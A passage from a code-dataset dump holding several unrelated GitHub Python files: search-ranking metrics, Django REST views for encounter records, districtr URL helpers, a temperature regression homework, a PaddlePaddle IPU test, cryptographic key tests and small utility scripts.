query_ndcg_new = cal_feedback_ndcg(\"get_jdcv_data/feedback2996.res\")\r\n for k, v in query_ndcg_old.items():\r\n dcg_old, ndcg_old, dcg_new, ndcg_new = query_ndcg_old[k][0], query_ndcg_old[k][2], query_ndcg_new.get(k, [0,0,0])[0], query_ndcg_new.get(k, [0,0,0])[2]\r\n res[k] = [dcg_old, ndcg_old, dcg_new, ndcg_new]\r\n #print(json.dumps(res, ensure_ascii=False))\r\n pass\r\n\r\ndef cal_weight_effect():\r\n dcg_new, ndcg_new, dcg_baseline, ndcg_baseline = 1e-8, 1e-8, 1e-8, 1e-8\r\n text = [e.strip().split(\"\\t\") for e in open(\"get_jdcv_data/feedback2982.res\", encoding=\"utf8\").readlines()]\r\n text_baseline = [e.strip().split(\"\\t\") for e in open(\"get_jdcv_data/feedback2982.res.baseline\", encoding=\"utf8\").readlines()]\r\n text_new = [e.strip().split(\"\\t\") for e in open(\"get_jdcv_data/feedback2982.res.new\", encoding=\"utf8\").readlines()]\r\n label_score = {\"_\".join([keyword, cv_id]): is_correct for id, rank, cv_id, pid, task_id, is_correct, createtime, keyword in text[1:]}\r\n for keyword, cv_ids in text_baseline:\r\n label_list = [label_score.get(\"_\".join([keyword, e]), 0) for e in cv_ids.split()]\r\n dcg, idcg, ndcg = cal_ndcg(label_list, 15)\r\n dcg_baseline += dcg; ndcg_baseline += ndcg\r\n avg_dcg_baseline = dcg_baseline / len(text_baseline); avg_ndcg_baseline = ndcg_baseline / len(text_baseline)\r\n for keyword, cv_ids in text_new:\r\n label_list = [label_score.get(\"_\".join([keyword, e]), 0) for e in cv_ids.split()]\r\n dcg, idcg, ndcg = cal_ndcg(label_list, 15)\r\n dcg_new += dcg; ndcg_new += ndcg\r\n avg_dcg_new = dcg_new / len(text_new); avg_ndcg_new = ndcg_new / len(text_new)\r\n print(\"avg_dcg_baseline: %.6f\\tavg_ndcg_baseline: %.6f\\navg_dcg_new: %.6f\\tavg_ndcg_new: %.6f\" % \\\r\n (avg_dcg_baseline, avg_ndcg_baseline, avg_dcg_new, avg_ndcg_new))\r\n a=1;\r\n\r\ndef t():\r\n import tensorflow as tf\r\n input_ids = [[6809, 4638, 689, 2900, 3403, 102, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]]\r\n _abs = tf.abs(input_ids); _used = tf.sign(_abs)\r\n _lengths = tf.reduce_sum(_used, reduction_indices=1)\r\n sess = tf.Session()\r\n fetch = sess.run([_abs, _used, _lengths], {tf.placeholder(dtype=tf.int64, shape=[None, len(input_ids[0])], name=\"input_ids\"): input_ids})\r\n aa=set([5,1,2,3,4]).symmetric_difference(set([2,1,4,3,5]))\r\n a=1\r\n\r\nif __name__ == \"__main__\":\r\n t()\r\n a=len(\"211\") #\"211\".isdigit()\r\n #gen_true_data(\"get_jdcv_data/query.freq.csv\", \"get_jdcv_data/query.true\")\r\n #test(); exit()\r\n #cal_feedback_ndcg(\"get_jdcv_data/feedback2982.res\")\r\n #cal_ndcg_train_data()\r\n #cal_ndcg_manual_data(1)\r\n #aa()\r\n cal_weight_effect()\r\n pass","repo_name":"yiwen92/my-project","sub_path":"queryweight/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":7387,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"18587640167","text":"from .serializers import LogSerializer\r\nfrom rest_framework import viewsets, permissions\r\n\r\nclass LogViewSet(viewsets.ModelViewSet):\r\n permission_classes = [\r\n permissions.IsAuthenticated,\r\n ]\r\n serializer_class = LogSerializer\r\n\r\n def get_queryset(self):\r\n return self.request.user.users.all()\r\n\r\n def perform_create(self, serializer):\r\n 
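# Stamp the authenticated user as the owner on create; because the value comes\r\n        # from request.user here, API clients cannot set or spoof the owner field.\r\n        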
serializer.save(owner=self.request.user)\r\n\r\n","repo_name":"hsima023/garden-watch-full-stack","sub_path":"backend/api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":419,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"10322158011","text":"import us\n\n\ndef ids(state):\n \"\"\"\n URL for accessing districtr identifiers.\n\n Args:\n state: Name of the state (e.g. `\"wisconsin\"`) for which we're retrieving\n districtr identifiers.\n\n Returns:\n String with the appropriate URL.\n \"\"\"\n # If we're in michigan, then we use the 'beta' pipeline instead of the 'prod'\n # one.\n pipeline = \"beta\" if state == us.states.MI else \"prod\"\n if state == us.states.MI:\n prefix = \"https://o1siz7rw0c.execute-api.us-east-2.amazonaws.com\"\n else:\n prefix = \"https://k61e3cz2ni.execute-api.us-east-2.amazonaws.com\"\n\n return f\"{prefix}/{pipeline}/submissions/districtr-ids/{state.name.lower()}\"\n\n\ndef csvs(state, ptype=\"plan\"):\n \"\"\"\n URL for accessing districtr plan metadata.\n\n Args:\n state: `us.States` object (e.g. `us.states.WI`)\n ptype: Type of plan we're retrieving; defaults to `\"plan\"`.\n\n Returns:\n String with the appropriate URL.\n \"\"\"\n pipeline = \"beta\" if state == us.states.MI else \"prod\"\n if state == us.states.MI:\n prefix = \"https://o1siz7rw0c.execute-api.us-east-2.amazonaws.com\"\n else:\n prefix = \"https://k61e3cz2ni.execute-api.us-east-2.amazonaws.com\"\n\n suffix = f\"?type={ptype}&length=10000\"\n\n return f\"{prefix}/{pipeline}/submissions/csv/{state.name.lower()}{suffix}\"\n\n\ndef one(identifier):\n \"\"\"\n URL for accessing an individual districtr plan.\n\n Args:\n identifier: districtr identifier.\n\n Returns:\n String with the appropriate URL.\n \"\"\"\n return f\"https://districtr.org/.netlify/functions/planRead?id={identifier}\"\n","repo_name":"mggg/gerrytools","sub_path":"gerrytools/data/URLs.py","file_name":"URLs.py","file_ext":"py","file_size_in_byte":1629,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"18594077399","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Apr 25 11:56:41 2020\n\n@author: anony1\n\"\"\"\n\n#Time Series and Simple Linear Regression p620 Deitel & Deitel\nimport pandas as pd\nnyc = pd.read_csv('C:\\\\CIS2532\\\\Hwk10\\\\ave_yearly_temp_nyc_1895-2017.csv')\nnyc.columns = ['Date', 'Temperature', 'Anomaly'] #Rename Value col to Temperature\nnyc.Date = nyc.Date.floordiv(100) \nnyc.head(3)\nfrom sklearn.model_selection import train_test_split\nX_train, X_test, y_train, y_test = train_test_split(\nnyc.Date.values.reshape(-1,1), nyc.Temperature.values, \nrandom_state=11)\n#Confirm the 75% - 25% train-test split by checking shapes:\nX_train.shape\nX_test.shape\nfrom sklearn.linear_model import LinearRegression\nlin_regress = LinearRegression()\nlin_regress.fit(X=X_train, y=y_train)\nlin_regress.coef_\nlin_regress.intercept_\npredicted = lin_regress.predict(X_test)\nexpected = y_test\n\nfor p, e in zip(predicted[::5], expected[::5]):\n print(f'predicted: {p:.2f}, expected: {e:.2f}')\n \n#Predicting future temps and estimating past temps\npredict = (lambda x: lin_regress.coef_ * x +\nlin_regress.intercept_)\npredict(2018)\npredict(1890)\n#Visualize the dataset w/the regression line\nimport seaborn as sns\n\naxes = sns.scatterplot(data=nyc, x='Date', y='Temperature', \n hue='Temperature', palette='winter', legend=False)\n##axes.set_ylim(10, 70) #better shows lin regression 
line\n\nimport numpy as np\nx = np.array([min(nyc.Date.values), max(nyc.Date.values)])\ny = predict(x)\nimport matplotlib.pyplot as plt\nline = plt.plot(x, y) \n#Looks better if comment out the set_ylim above\n#Shows scatterplot w/line of regress thru it\n\n#To answer question 2, must go back to NOAA website and get Jan\n# data for NYC - make sure at top to go to CITY\n#https://www.ncdc.noaa.gov/cag/city/time-series/USH00305801/tavg/1/1/1895-2017?base_prd=true&begbaseyear=1901&endbaseyear=2000\n#from orig website:\n#https://www.ncdc.noaa.gov/cag\n#\n#After plot it, then click excel button to download the .csv file\n# of your data.\n#That data file named:\n##############################################\nnycJan = pd.read_csv('C:\\\\CIS2532\\\\Hwk10\\\\ave_yearly_tempJAN_nyc_1895-2017.csv')\nnycJan.columns = ['Date', 'Temperature', 'Anomaly'] #Rename Value col to Temperature\nnycJan.Date = nycJan.Date.floordiv(100) \nnycJan.head(3)\nfrom sklearn.model_selection import train_test_split\nX_trainJ, X_testJ, y_trainJ, y_testJ = train_test_split(\nnycJan.Date.values.reshape(-1,1), nycJan.Temperature.values, \nrandom_state=11)\n#Confirm the 75% - 25% train-test split by checking shapes:\nX_trainJ.shape\nX_testJ.shape\nfrom sklearn.linear_model import LinearRegression\nlin_regressJan = LinearRegression()\nlin_regressJan.fit(X=X_trainJ, y=y_trainJ)\nlin_regressJan.coef_\nlin_regressJan.intercept_\npredictedJan = lin_regressJan.predict(X_testJ)\nexpectedJan = y_testJ\n\nfor p, e in zip(predictedJan[::5], expectedJan[::5]):\n    print(f'predicted January: {p:.2f}, expected January: {e:.2f}')\n    \n#Predicting future temps and estimating past temps\npredictJan = (lambda x: lin_regressJan.coef_ * x +\nlin_regressJan.intercept_)\npredictJan(2018)\npredictJan(1890)\n#Visualize the dataset w/the regression line\nimport seaborn as sns\n\naxesJan = sns.scatterplot(data=nycJan, x='Date', y='Temperature', \n                       hue='Temperature', palette='winter', legend=False)\n##axes.set_ylim(10, 70) #better shows lin regression line\n\nimport numpy as np\nx = np.array([min(nycJan.Date.values), max(nycJan.Date.values)])\ny = predictJan(x)\nimport matplotlib.pyplot as plt\nline = plt.plot(x, y) \n#Looks better if comment out the set_ylim above\n#Shows scatterplot w/line of regress thru it\n\n#To answer question 2, must go back to NOAA website and get Jan\n# data for NYC - make sure at top to go to CITY\n#https://www.ncdc.noaa.gov/cag/city/time-series/USH00305801/tavg/1/1/1895-2017?base_prd=true&begbaseyear=1901&endbaseyear=2000\n#from orig website:\n#https://www.ncdc.noaa.gov/cag\n#\n#After plot it, then click excel button to download the .csv file\n# of your data.\n#That data file named:\n\n\n","repo_name":"serviceberry1/CIS2532","sub_path":"Hwk10/Q2nyc1.py","file_name":"Q2nyc1.py","file_ext":"py","file_size_in_byte":3983,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"10485761123","text":"from rest_framework import status\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom rest_framework import permissions\nfrom encounterapp.models.modifydelete import ModifyDelete\nfrom encounterapp.models.encounter import Encounter\nfrom encounterapp.serializers.encounter import AllEncounterSerializer\nfrom encounterapp.serializers.modifydelete import ModifyDeleteSerializer,EncounterAdminStatusSerializer,ModifyDeleteListSerializer,EncounterFlagDeadSerializer\nfrom datetime import datetime, timedelta\n\n\n\n\nclass 
IsPostOrIsAuthenticated(permissions.BasePermission):\n\n def has_permission(self, request, view):\n \treturn request.user and request.user.is_authenticated\n\n\nclass ModifyDeleteDetail(APIView):\n permission_classes = (IsPostOrIsAuthenticated ,)\n serializer_class = ModifyDeleteSerializer\n\n def get(self, request):\n modify_delete_obj = ModifyDelete.objects.all().order_by(\"-id\")\n serializer = ModifyDeleteListSerializer(modify_delete_obj,\\\n many=True, context={\"request\":request})\n return Response(serializer.data, status=200)\n\n def post(self,request):\n serializer = ModifyDeleteSerializer(data=request.data)\n if serializer.is_valid():\n modify_delete_obj = ModifyDelete()\n encounter_obj = Encounter.objects.filter(id=serializer.validated_data['encounter'].id)\n if encounter_obj:\n encounter_obj = Encounter.objects.get(id=serializer.validated_data['encounter'].id)\n if encounter_obj.active == False:\n return Response({\"message\":\"This encounter has already been deleted.\"}, status=400)\n if encounter_obj.request_counter >= 3:\n return Response({\"message\":\"Your request limit already reached.\"},status=400)\n if ModifyDelete.objects.filter(encounter__id = serializer.validated_data['encounter'].id,flag='delete') or ModifyDelete.objects.filter(encounter__id =serializer.validated_data['encounter'].id,flag='modify'):\n return Response({\"message\":\"You already have a request sent.\"}, status=400)\n if serializer.validated_data['flag'] == \"modify\":\n if serializer.validated_data['reason_for_modification'] == None:\n return Response({\"message\":\"Please enter reason for modification.\"},status=400)\n modify_delete_obj.reason_for_modification = serializer.validated_data['reason_for_modification']\n modify_delete_obj.modify_status = \"pending\"\n\n if serializer.validated_data['flag'] == \"delete\":\n if serializer.validated_data['reason_for_deletion'] == \"other\" and serializer.validated_data['other_reason_for_deletion'] == None:\n return Response({\"message\":\"You should enter the field either reason for deletion or other reason for deletion.\"},status=400)\n if serializer.validated_data['reason_for_deletion'] == \"other\":\n modify_delete_obj.other_reason_for_deletion = serializer.validated_data['other_reason_for_deletion']\n modify_delete_obj.reason_for_deletion = serializer.validated_data['reason_for_deletion']\n modify_delete_obj.delete_status = 'pending'\n modify_delete_obj.author = request.user\n modify_delete_obj.encounter = serializer.validated_data['encounter']\n modify_delete_obj.flag = serializer.validated_data['flag']\n modify_delete_obj.save()\n return Response({\"message\":\"Your request sent successfully.\"},status=200)\n return Response({\"message\":\"Encounter doesn't exists.\"},status=400)\n return Response(serializer.errors,status=400)\n\n\nclass EncounterAdminStatus(APIView):\n permission_classes = (IsPostOrIsAuthenticated ,)\n serializer_class = EncounterAdminStatusSerializer\n\n def get(self, request, id):\n if ModifyDelete.objects.filter(id=id):\n mod_obj = ModifyDelete.objects.get(id=id)\n serializer = ModifyDeleteListSerializer(mod_obj, context={\"request\":request})\n return Response(serializer.data, status=200)\n return Response({\"message\":\"Flag id do not match.\"}, status=400)\n\n def put(self, request, id):\n if ModifyDelete.objects.filter(id=id):\n mod_obj = ModifyDelete.objects.get(id=id)\n serializer = EncounterAdminStatusSerializer(mod_obj,\\\n data=request.data,context={'request': request},partial=True)\n if request.user.admin:\n if 
serializer.is_valid():\n                if mod_obj.delete_status == 'pending' and serializer.validated_data['delete_status'] == 'deleted':\n                    mod_obj.delete_status = 'deleted'\n                    mod_obj.deleted_at = datetime.now()\n                    mod_obj.restore_expiry_date = datetime.now()+timedelta(days=30)\n                    mod_obj.save()\n\n                    encounter_obj = Encounter.objects.get(id=mod_obj.encounter.id)\n                    encounter_obj.active = False\n                    encounter_obj.request_counter += 1\n                    # NOTE: Visualization is referenced here (and below) but never imported in\n                    # this module; the matching model import is still required for this to run.\n                    visual_obj = Visualization.objects.filter(encounter_id=encounter_obj.id)\n                    if visual_obj:\n                        visual_obj = Visualization.objects.get(encounter_id=encounter_obj.id)\n                        visual_obj.delete()\n                    encounter_obj.save()\n                    return Response({\"message\":\"Encounter deleted successfully.\"}, status=200)\n                if mod_obj.delete_status == 'pending' and serializer.validated_data['delete_status'] == 'rejected':\n                    mod_obj.delete_status = 'rejected'\n                    mod_obj.flag = ''\n                    mod_obj.save()\n                    return Response({\"message\":\"Encounter delete request is rejected.\"}, status=200)\n                if mod_obj.modify_status == 'pending':\n                    if serializer.validated_data['modify_status'] == 'approved':\n                        mod_obj.modify_approved_at = datetime.now()\n                        mod_obj.modify_expiry_date = datetime.now()+timedelta(days=7)\n                        mod_obj.modify_status = 'approved'\n                        mod_obj.save()\n\n                        encounter_obj = Encounter.objects.get(id=mod_obj.encounter.id)\n                        encounter_obj.request_counter += 1\n\n                        visual_obj = Visualization.objects.filter(encounter_id=encounter_obj.id)\n                        if visual_obj:\n                            visual_obj = Visualization.objects.get(encounter_id=encounter_obj.id)\n                            visual_obj.delete()\n                        encounter_obj.save()\n                        return Response({\"message\":\"Modification request approved.\"}, status=200)\n                    if serializer.validated_data['modify_status'] == 'rejected':\n                        mod_obj.modify_status = 'rejected'\n                        mod_obj.flag = ''\n                        mod_obj.save()\n                        return Response({\"message\": \"Modification request rejected.\"}, status=200)\n                return Response({\"message\":\"Neither modify nor delete action performed\"}, status=200)\n            return Response(serializer.errors, status=400)\n        return Response({\"message\":\"Only admin can change status.\"}, status=401)\n    return Response({\"message\":\"Flag id do not match.\"}, status=400)\n\n\n\nclass EncounterFlagDead(APIView):\n    permission_classes = (IsPostOrIsAuthenticated ,)\n    serializer_class = EncounterFlagDeadSerializer\n\n    def put(self, request, id):\n        mod_obj = ModifyDelete.objects.get(id=id)\n        serializer = EncounterFlagDeadSerializer(mod_obj, data=request.data,\\\n         context={'request': request}, partial=True)\n        if serializer.is_valid():\n            if mod_obj.modify_status == 'approved':\n                if serializer.validated_data['modify_status'] == 'modified':\n                    mod_obj.modify_status = 'modified'\n                    mod_obj.flag = ''\n                    mod_obj.save()\n                    return Response({\"message\":\"Encounter modified successfully and flag killed.\"}, status=200)\n                return Response({\"message\":\"Only modify status equals to modified can kill the flag.\"},status=400)\n            return Response({\"message\": \"modify status must be approved before killing flag.\"}, status=400)\n        return Response(serializer.errors, status=400)\n\n\n\nclass EncounterRestore(APIView):\n    permission_classes = (IsPostOrIsAuthenticated ,)\n\n    def put(self, request,encounter_id):\n        encounter_obj = Encounter.objects.filter(id=encounter_id, active=False)\n        if encounter_obj:\n            mod_obj = ModifyDelete.objects.filter(encounter=encounter_id, delete_status='deleted', author=request.user)\n            if mod_obj:\n                mod_obj = ModifyDelete.objects.get(encounter=encounter_id, delete_status='deleted', author=request.user)\n                if datetime.now().timestamp() < mod_obj.restore_expiry_date.timestamp():\n                    mod_obj.delete_status = ''\n                    mod_obj.flag = ''\n                    mod_obj.save()\n\n                    encounter_obj = Encounter.objects.get(id=encounter_id)\n                    encounter_obj.active = True\n                    visual_obj = Visualization.objects.filter(encounter_id=encounter_obj.id)\n                    if visual_obj:\n                        visual_obj = Visualization.objects.get(encounter_id=encounter_obj.id)\n                        visual_obj.delete()\n                    encounter_obj.save()\n                    return Response({'message':'Encounter restored successfully.'}, status=200)\n                return Response({'message':\"Restoration time expired.\"}, status=400)\n            return Response({\"message\":\"flag doesn't exist\"},status=400)\n        return Response({'message':\"No deleted encounter found.\"}, status=400)\n\n\n\nclass CheckModifyExpiry(APIView):\n\n    def get(self,request):\n        mod_obj = ModifyDelete.objects.filter(modify_status='approved')\n        if mod_obj:\n            for i in mod_obj:\n                if datetime.now().timestamp() > i.modify_expiry_date.timestamp():\n                    i.modify_status = 'expired'\n                    i.flag = ''\n                    i.save()\n            return Response({'message':'All the encounter flags with expired modify dates are killed'},status=200)\n        return Response({\"message\":\"No deleted encounter found.\"}, status=400)\n\n\nclass CheckRestoreExpiry(APIView):\n\n    def get(self,request):\n        mod_obj = ModifyDelete.objects.filter(delete_status='deleted')\n        if mod_obj:\n            for i in mod_obj:\n                if datetime.now().timestamp() > i.restore_expiry_date.timestamp():\n                    encounter_obj = Encounter.objects.get(id=i.encounter.id)\n                    encounter_obj.delete()\n            return Response({'message':'All the encounters with expired restoration dates are removed from the recycle bin'},status=200)\n        return Response({\"message\":\"No deleted encounter found.\"}, status=400)\n\n\n\nclass Recyclebin(APIView):\n    permission_classes = (IsPostOrIsAuthenticated ,)\n    serializer_class = AllEncounterSerializer\n\n    def get(self,request):\n        encounter_obj = Encounter.objects.filter(active=False)\n        serializer = AllEncounterSerializer(encounter_obj,many=True,context={\"request\":request})\n        return Response(serializer.data,status=200)\n\n\n\n\n\n\n","repo_name":"AbhiyantrikTechnology/DentalHub-Backend","sub_path":"encounterapp/api/modifydelete.py","file_name":"modifydelete.py","file_ext":"py","file_size_in_byte":11766,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"}
{"seq_id":"40385692161","text":"import numpy as np\nimport time\nfrom os import listdir\nfrom os.path import isfile, join\nimport torch\nfrom transformers import BertForSequenceClassification, BertTokenizer\ndef get_sentiment(model, tokenizer, text_batch): #Large batches cause memory problems\n    model.eval()\n    with torch.no_grad():\n        encoding = tokenizer(text_batch, return_tensors='pt', padding=True, truncation=True).to(device)\n        outputs = model(encoding['input_ids']).logits\n        pred = torch.argmax(outputs, axis=1)\n    return pred.detach().numpy()\n\ndef get_sent(model, tokenizer, texts, batch_size=5):\n    sent = [\"NULL\"] * len(texts)\n    ind_buffer = []\n    for i in range(len(texts)):\n        if(texts[i] != \"NULL\"):\n            ind_buffer.append(i)\n        if(len(ind_buffer) == batch_size):\n            sent_batch = get_sentiment(model, tokenizer, [texts[j] for j in ind_buffer])\n            for j in range(len(sent_batch)):\n                sent[ind_buffer[j]] = str(sent_batch[j])\n            ind_buffer = list()\n    if(len(ind_buffer) > 0):\n        sent_batch = get_sentiment(model, tokenizer, [texts[j] for j in ind_buffer])\n        for j in range(len(sent_batch)):\n            sent[ind_buffer[j]] = str(sent_batch[j])\n        ind_buffer = list()\n    return sent\n\n\ndef rerun_file(file_path, new_path, model, 
tokenizer):\n\n fields, texts = [], []\n with open(file_path, 'r') as f:\n line = f.readline().strip()\n i = 0\n while(line != ''):\n if(line[0] != '1'):\n line = f.readline().strip()\n continue\n splt = line.split('\\t')\n text = splt[6].split('https://t.co')[0]\n if(len(text) < 10):\n line = f.readline().strip()\n continue\n i += 1\n\n fields.append(splt)\n texts.append(text)\n\n #id, date, time, language, geo, sentiment, text\n\n line = f.readline().strip()\n sents = get_sent(model, tokenizer, texts)\n print(file_path, new_path)\n with open(new_path, 'w+') as nf:\n for i in range(len(fields)):\n nf.write('\\t'.join(fields[i][:5] + [sents[i]] + [texts[i]]) + '\\n')\n\ndevice = 'cpu'\nmodel = BertForSequenceClassification.from_pretrained('./saves/sent_0.pt').to(device)\ntokenizer = BertTokenizer.from_pretrained('bert-base-uncased')\n\ndir_path = \"./data/day/\"\nfile_paths = [f for f in listdir(dir_path) if isfile(join(dir_path, f)) and f[:4] == 'sent']\nk = 0\nfor fp in file_paths:\n k += 1\n if(isfile(\"./data/proc_day/proc\" + fp[4:])):\n continue\n print(f'Rerunning file: {fp} - Progress: {k} / {len(file_paths)} ')\n rerun_file(\"./data/day/\" + fp, \"./data/proc_day/proc\" + fp[4:], model, tokenizer)\n","repo_name":"niloofarshadab/Sentiment-Analysis-for-Twitter-data-during-COVID-19-Pandemic","sub_path":"rerun.py","file_name":"rerun.py","file_ext":"py","file_size_in_byte":2708,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"16834209547","text":"from __future__ import print_function\n\nimport numpy as np\nimport unittest\nimport sys\nimport paddle\nimport paddle.fluid as fluid\nimport paddle.static\nfrom paddle.optimizer.lr import LRScheduler\n\npaddle.enable_static()\nSEED = 2021\n\n\nclass LR_New(LRScheduler):\n def __init__(self, learning_rate=1.0, last_epoch=-1, verbose=False):\n super(LR_New, self).__init__(learning_rate, last_epoch, verbose)\n\n def get_lr(self):\n self.base_lr = self.base_lr + 1\n self.last_epoch = self.last_epoch + 1\n return self.base_lr\n\n\n@unittest.skipIf(not paddle.is_compiled_with_ipu(),\n \"core is not compiled with IPU\")\nclass TestConvNet(unittest.TestCase):\n def _test(self, run_ipu=True):\n scope = fluid.core.Scope()\n main_prog = paddle.static.Program()\n startup_prog = paddle.static.Program()\n main_prog.random_seed = SEED\n startup_prog.random_seed = SEED\n np.random.seed(SEED)\n\n np_image = np.random.rand(1, 3, 10, 10).astype(np.float32)\n\n with fluid.scope_guard(scope):\n with paddle.static.program_guard(main_prog, startup_prog):\n image = paddle.static.data(\n name='image', shape=[1, 3, 10, 10], dtype='float32')\n conv1 = paddle.static.nn.conv2d(\n image, num_filters=3, filter_size=3, bias_attr=False)\n loss = paddle.mean(conv1)\n\n sgd = paddle.optimizer.SGD(learning_rate=LR_New())\n sgd.minimize(loss)\n\n if run_ipu:\n place = paddle.IPUPlace()\n else:\n place = paddle.CPUPlace()\n exe = paddle.static.Executor(place)\n exe.run(startup_prog)\n\n if run_ipu:\n feed_list = [image.name]\n fetch_list = [loss.name]\n ipu_strategy = paddle.static.IpuStrategy()\n ipu_strategy.set_graph_config(is_training=True)\n program = paddle.static.IpuCompiledProgram(\n main_prog, ipu_strategy=ipu_strategy).compile(feed_list,\n fetch_list)\n else:\n program = main_prog\n\n result = []\n for epoch in range(100):\n if hasattr(program, \"lr_sheduler\"):\n program.lr_sheduler.step()\n loss_res = exe.run(program,\n feed={image.name: np_image},\n fetch_list=[loss])\n result.append(loss_res)\n\n return 
np.array(result)\n\n def test_training(self):\n # cpu and ipu dimenstion mismatch, cpu:(100, 1, 1), ipu:(100, 1)\n ipu_loss = self._test(True).flatten()\n cpu_loss = self._test(False).flatten()\n\n self.assertTrue(np.allclose(ipu_loss, cpu_loss, atol=1e-4))\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"EnnSou/ooss-paddle2.3","sub_path":"python/paddle/fluid/tests/unittests/ipu/test_lr_sheduler_ipu.py","file_name":"test_lr_sheduler_ipu.py","file_ext":"py","file_size_in_byte":2936,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"20637627359","text":"import webcrypt.keys as wk\nimport pytest\n\nimport cryptography.hazmat.primitives.asymmetric.ec as ec\n\n_supported_curves = {\n \"secp256k1\": ec.SECP256K1(),\n \"secp256r1\": ec.SECP256R1(),\n \"secp384r1\": ec.SECP384R1(),\n \"secp521r1\": ec.SECP521R1(),\n}\n\n\n@pytest.mark.parametrize(\n \"ec_curve\",\n list(_supported_curves.values())\n)\ndef test_ec_export_import(ec_curve):\n privkey = wk.ECKey(ec_curve)\n\n # test serialization and de-serialization of an ec privkey across all supported curves\n h1 = privkey.privkey_hex()\n privkey2 = wk.ECKey.privkey_from_hex(h1, ec_curve)\n h2 = privkey2.privkey_hex()\n assert h1 == h2\n\n # test ser and de-ser of ec-pubkey across all curves, and pubkey formats\n for fmt in list(wk.ECKey.PubHexFormat):\n h1 = privkey.pubkey_hex(fmt)\n pubkey2 = wk.ECKey.pubkey_from_hex(h1, ec_curve, fmt)\n h2 = pubkey2.pubkey_hex(fmt)\n assert h1 == h2\n\n\n@pytest.mark.parametrize(\n \"ec_curve\",\n list(_supported_curves.values())\n)\ndef test_ec_sign_verify(ec_curve):\n privkey1 = wk.ECKey(ec_curve)\n\n privkey2 = wk.ECKey(ec_curve)\n\n data = b\"some data to be signed\"\n\n sig = privkey1.sign(data)\n\n assert privkey1.verify(data, sig)\n\n assert not privkey2.verify(data, sig)\n assert not privkey1.verify(data[:-1], sig)\n assert not privkey1.verify(data, sig[:1])\n\n\n@pytest.mark.parametrize(\n \"ec_curve\",\n list(_supported_curves.values())\n)\ndef test_ecdh(ec_curve):\n privkey1 = wk.ECKey(ec_curve)\n privkey2 = wk.ECKey(ec_curve)\n\n dk1 = wk.ECKey.ecdh_derive_key(privkey1.privkey, privkey2.pubkey)\n dk2 = wk.ECKey.ecdh_derive_key(privkey2.privkey, privkey1.pubkey)\n\n assert dk1 == dk2\n\n\ndef test_ed_export_import():\n privkey = wk.EDKey()\n\n h1 = privkey.privkey_hex()\n privkey2 = wk.EDKey.privkey_from_hex(h1)\n h2 = privkey2.privkey_hex()\n assert h1 == h2\n\n p1 = privkey.pubkey_hex()\n pubkey2 = wk.EDKey.pubkey_from_hex(p1)\n p2 = pubkey2.pubkey_hex()\n\n assert p1 == p2\n\n\ndef test_ed_sign_verify():\n priv1 = wk.EDKey()\n priv2 = wk.EDKey()\n\n data = b'some data that needs to be signed and verified'\n\n assert priv1.verify(data, priv1.sign(data))\n assert not priv1.verify(data, priv2.sign(data))\n assert not priv1.verify(data[:-1], priv1.sign(data))\n assert not priv1.verify(data, priv1.sign(data)[:-1])\n","repo_name":"plataux/webcrypt","sub_path":"tests/test_curves.py","file_name":"test_curves.py","file_ext":"py","file_size_in_byte":2355,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"70999068946","text":"\"\"\"\nformatter yeah ill riir\n\"\"\"\n\ntext = input()\n\nINDENT = 0\nSKIP = False\nfor i in text:\n if SKIP :\n SKIP = False\n continue\n print(i, end=\"\")\n if i == \"[\":\n INDENT += 4\n print()\n print(\" \"*INDENT, end=\"\")\n if i == \"]\":\n INDENT -= 4\n if i == \",\":\n print()\n print(\" \"*INDENT, end=\"\")\n SKIP = 
True\n\nprint()\n","repo_name":"HiddyTiddy/tost","sub_path":"format.py","file_name":"format.py","file_ext":"py","file_size_in_byte":381,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"40732470680","text":"n = int(input('Number: '))\n\nstart = 6 # pyrvoto perfektno 4islo\n\nwhile True:\n\tdivisors_sum = 0\n\tdivisor = 1\n\n\twhile divisor < start:\n\t\tif start % divisor == 0:\n\t\t\tdivisors_sum += divisor\n\n\t\tdivisor += 1\n\n\tif divisors_sum == start:\n\t\tprint(start)\n\t\tn = n - 1\n\n\tif n == 0:\n\t\tbreak\n\n\tstart += 1\n\n","repo_name":"AnetaStoycheva/Programming0_HackBulgaria","sub_path":"Week 2/first_n_perfect.py","file_name":"first_n_perfect.py","file_ext":"py","file_size_in_byte":294,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"692452830","text":"import logging\n\nfrom aiogram import bot, Dispatcher, executor, types, Bot\n\nAPI_TOKEN = 'Your Bot token'\n\nlogging.basicConfig(level=logging.INFO)\n\nbot = Bot(token=API_TOKEN)\nab = Dispatcher(bot)\n\n@ab.message_handler(commands=['start', 'help'])\nasync def send_welcome(message: types.Message):\n\n\n await message.reply(\"Prince12_botiga XUSH KELIBSIZ! \")\n\n@ab.message_handler()\nasync def echo(message: types.Message):\n await message.answer(message.text)\n\nif __name__ == '__main__':\n executor.start_polling(ab, skip_updates=True)\n","repo_name":"Prince12Alimardon/TelegramBots","sub_path":"EXOBot.py","file_name":"EXOBot.py","file_ext":"py","file_size_in_byte":533,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"73963030224","text":"import numpy as np\nimport cv2\nimport matplotlib as plt\n\nimg = cv2.imread('1.jpg')\n(h, w, d) = img.shape\nprint(\"width={}, height={}, depth={}\".format(w, h, d))\nscale_percent = 120 